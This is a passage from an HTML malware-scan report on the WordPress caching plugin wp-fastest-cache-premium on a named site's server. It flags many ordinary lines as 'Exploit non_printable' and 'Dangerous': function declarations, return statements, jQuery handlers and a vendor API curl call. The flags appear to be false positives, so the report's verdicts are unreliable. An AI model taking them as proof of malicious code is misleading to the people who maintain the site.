</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">split_html_condition</span><span style="color: #007700">(</span><span style="color: #0000BB">$tag</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_js</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 976</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_520").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/lazy-load.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.84 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_521" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$js</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mark_attachment_page_images</span><span style="color: #007700">(</span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$attachment</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$attr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_thumbnail</span><span style="color: #007700">(</span><span style="color: #0000BB">$src</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 159</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_third_party</span><span style="color: #007700">(</span><span style="color: #0000BB">$src</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_full</span><span style="color: #007700">(</span><span style="color: #0000BB">$img</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_exclude</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_placeholder</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">background_to_lazyload</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$inline_scripts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">images_to_lazyload</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$inline_scripts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 346</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">iframe_to_lazyload</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$inline_scripts</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 375</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_js_source_new</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$js</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 403</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_js_source</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_lazy</span><span style="color: #007700">(</span><span style="color: #0000BB">$img</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_mobile</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 74</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_mobile</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mark_content_images</span><span style="color: #007700">(</span><span style="color: #0000BB">$content</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_521").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/templates/mobile_theme.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.38 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_522" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ if(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)){ </span><span style="color: #0000BB">Wpfc_New_Dialog</span><span style="color: #007700">.</span><span style="color: #0000BB">dialog</span><span style="color: #007700">(</span><span style="color: #DD0000">"wpfc-modal-mobiletheme"</span><span style="color: #007700">, {</span><span style="color: #0000BB">close</span><span style="color: #007700">: function(){ </span><span style="color: #0000BB">Wpfc_New_Dialog</span><span style="color: #007700">.</span><span style="color: #0000BB">set_values_from_tmp_to_real</span><span style="color: #007700">(); </span><span style="color: #0000BB">Wpfc_New_Dialog</span><span style="color: #007700">.clone.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(); }}, function(</span><span style="color: #0000BB">dialog</span><span style="color: #007700">){ </span><span style="color: #0000BB">dialog</span><span style="color: #007700">.clone.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">"select"</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#wpFastestCa</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">dialog</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_522").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/templates/buy_credit.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.70 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_523" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'curl_exec'</span><span style="color: #007700">)){ </span><span style="color: #0000BB">$ch </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_HEADER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">"http://api.wpfastestcache.net/prices/imagecredit"</span><span style="color: #007700">); </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_close</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">); }else{ </span><span style="color: #0000BB">$dat</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'curl_exec'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_523").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/templates/lazy-load.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.89 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_524" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">dialog</span><span style="color: #007700">){ if(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#wpFastestCacheLazyLoad_placeholder"</span><span style="color: #007700">).</span><span style="color: #0000BB">length </span><span style="color: #007700">== </span><span style="color: #0000BB">0</span><span style="color: #007700">){ </span><span style="color: #0000BB">Wpfc_New_Dialog</span><span style="color: #007700">.</span><span style="color: #0000BB">show_page</span><span style="color: #007700">(</span><span style="color: #0000BB">2</span><span style="color: #007700">); </span><span style="color: #0000BB">Wpfc_New_Dialog</span><span style="color: #007700">.</span><span style="color: #0000BB">show_button</span><span style="color: #007700">(</span><span style="color: #DD0000">"finish"</span><span style="color: #007700">); }else{ </span><span style="color: #0000BB">Wpfc_New_Dialog</span><span style="color: #007700">.clone.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">"div.window-content select.wpFastestCacheLazyLoad_placeholder"</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#wpFast</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){return </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">text</span><span style="color: #007700">;}).</span><span style="color: #0000BB">get</span><span style="color: #007700">().</span><span style="color: #0000BB">join</span><span style="color: #007700">(</span><span style="color: #DD0000">","</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">dialog</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_524").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/wpFastestCachePremium.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.44 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_525" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">; } function </span><span style="color: #0000BB">wpfc_delete_webp</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">){ if(isset(</span><span style="color: #0000BB">$id</span><span style="color: #007700">)){ </span><span style="color: #0000BB">$data </span><span style="color: #007700">= </span><span style="color: #0000BB">wp_get_attachment_metadata</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">); if(isset(</span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">"file"</span><span style="color: #007700">])){ </span><span style="color: #0000BB">$path </span><span style="color: #007700">= </span><span style="color: #0000BB">WPFC_WP_CONTENT_DIR</span><span style="color: #007700">.</span><span style="color: #DD0000">"/uploads/"</span><span style="color: #007700">.</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">"file"</span><span style="color: #007700">]); if(</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">.</span><span style="color: #DD0000">"/"</span><span style="color: #007700">.</span><span style="color: #0000BB">basename</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">[</span><span style="color: #DD0000">"file"</span><span style="color: #007700">]).</span><span style="color: #DD0000">".webp"</span><span style="color: #007700">)){ @</span><span style="color: #0000BB">unlink</span><span style="color: #007700">($</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"curl_init"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_image_credit_template_ajax_request</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 160</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_mts_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_load_mobile_style</span><span style="color: #007700">(){</span>
</span>
